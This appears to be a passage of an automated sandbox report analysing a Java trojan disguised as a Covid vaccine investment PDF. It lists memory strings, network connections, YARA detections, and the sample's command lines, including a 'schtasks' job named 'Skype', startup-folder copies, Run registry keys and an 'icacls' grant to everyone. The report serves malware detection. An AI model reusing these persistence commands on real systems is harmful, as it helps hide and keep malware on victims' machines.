            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: javaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
            Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240964215.000000000A300000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmpString found in binary or memory: https://github-releases.githubusercontent.com/51361554/623ef000-9da4-11e9-9ea2-d90155318994?X-Amz-Al
            Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpString found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
            Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
            Source: javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.237181358.0000000004A90000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS3
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSA
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSc
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSk
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPSs
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.108.154:443 -> 192.168.2.3:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.3:49729 version: TLS 1.2
            Source: 00000006.00000002.207844794.0000000014D78000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: 00000002.00000003.200309664.0000000002C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: Process Memory Space: 7za.exe PID: 384, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: C:\jar\keuqzwqbvn\resources\umxybpjabc, type: DROPPEDMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: C:\Users\user\fukvowbkrs.js, type: DROPPEDMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
            Source: classification engineClassification label: mal80.troj.expl.evad.winJAR@34/30@13/7
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile created: C:\Users\user\fukvowbkrs.jsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3096:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll
            Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\7za.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: javaw.exeString found in binary or memory: k.in-addr.arpa
            Source: java.exeString found in binary or memory: J-addWaiter
            Source: java.exeString found in binary or memory: k.in-addr.arpa
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: unknownProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl >> C:\cmdlinestart.log 2>&1
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
            Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\fukvowbkrs.js
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: unknownProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\fukvowbkrs.js
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

            Data Obfuscation:

            barindex
            Yara detected Allatori_JAR_ObfuscatorShow sources
            Source: Yara matchFile source: 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.352640886.000000000461D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.520047801.000000000A56A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.520214796.000000000A5A2000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.352612506.0000000004610000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.317682510.0000000004E1D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.317809866.0000000004E65000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.520453366.0000000009F6C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.352788509.0000000004665000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.317648149.0000000004E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.253164708.000000000A56E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 720, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 4952, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 3164, type: MEMORY
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0277B377 push 00000000h; mov dword ptr [esp], esp
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0277BB27 push 00000000h; mov dword ptr [esp], esp
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0277B907 push 00000000h; mov dword ptr [esp], esp
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0277A1DB push ecx; ret
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0277A1CA push ecx; ret
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0277C437 push 00000000h; mov dword ptr [esp], esp
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_02782D44 push eax; retf
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_0281FFF0 pushad ; iretd
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_02817C51 push cs; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 11_3_150F0869 push ds; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 11_3_150F0869 push ds; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 11_3_150F0869 push ds; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 11_3_150F0869 push ds; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C721CD push esi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7C1D1 push esi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BFD0 push edi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BFE9 push esi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C73FF3 push eax; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C71BF9 push esi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7C180 push edi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7C198 push edi; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BDA5 pushad ; retf 0015h
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BDA1 push edx; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BDA9 push edx; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C72151 push ebp; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BD67 push edx; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BF61 push ebp; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C71B69 push edx; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C71507 push edx; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C7BD01 push ebx; retf
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 13_3_15C71515 push esi; retf

            Persistence and Installation Behavior:

            barindex
            Exploit detected, runtime environment dropped PE fileShow sources
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: jna7235467147341798336.dll.13.drJump to dropped file
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dllJump to dropped file
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dllJump to dropped file
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dllJump to dropped file

            Boot Survival:

            barindex
            Creates autostart registry keys to launch javaShow sources
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run plugins "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\plugins.jar" mp
            Creates multiple autostart registry keysShow sources
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run plugins
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhzJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txtJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txtJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txtJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhzJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhzJump to behavior
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run plugins
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run plugins
            Source: C:\Windows\SysWOW64\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
            Source: java.exe, 00000006.00000003.203419915.0000000014C60000.00000004.00000001.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
            Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: java.exe, 00000006.00000002.206842992.0000000002675000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.236445612.0000000002870000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.251699367.0000000002DE0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.512262138.0000000002730000.00000004.00000001.sdmpBinary or memory string: ,java/lang/VirtualMachineError
            Source: java.exe, 00000006.00000002.206842992.0000000002675000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.236445612.0000000002870000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.251699367.0000000002DE0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.512262138.0000000002730000.00000004.00000001.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
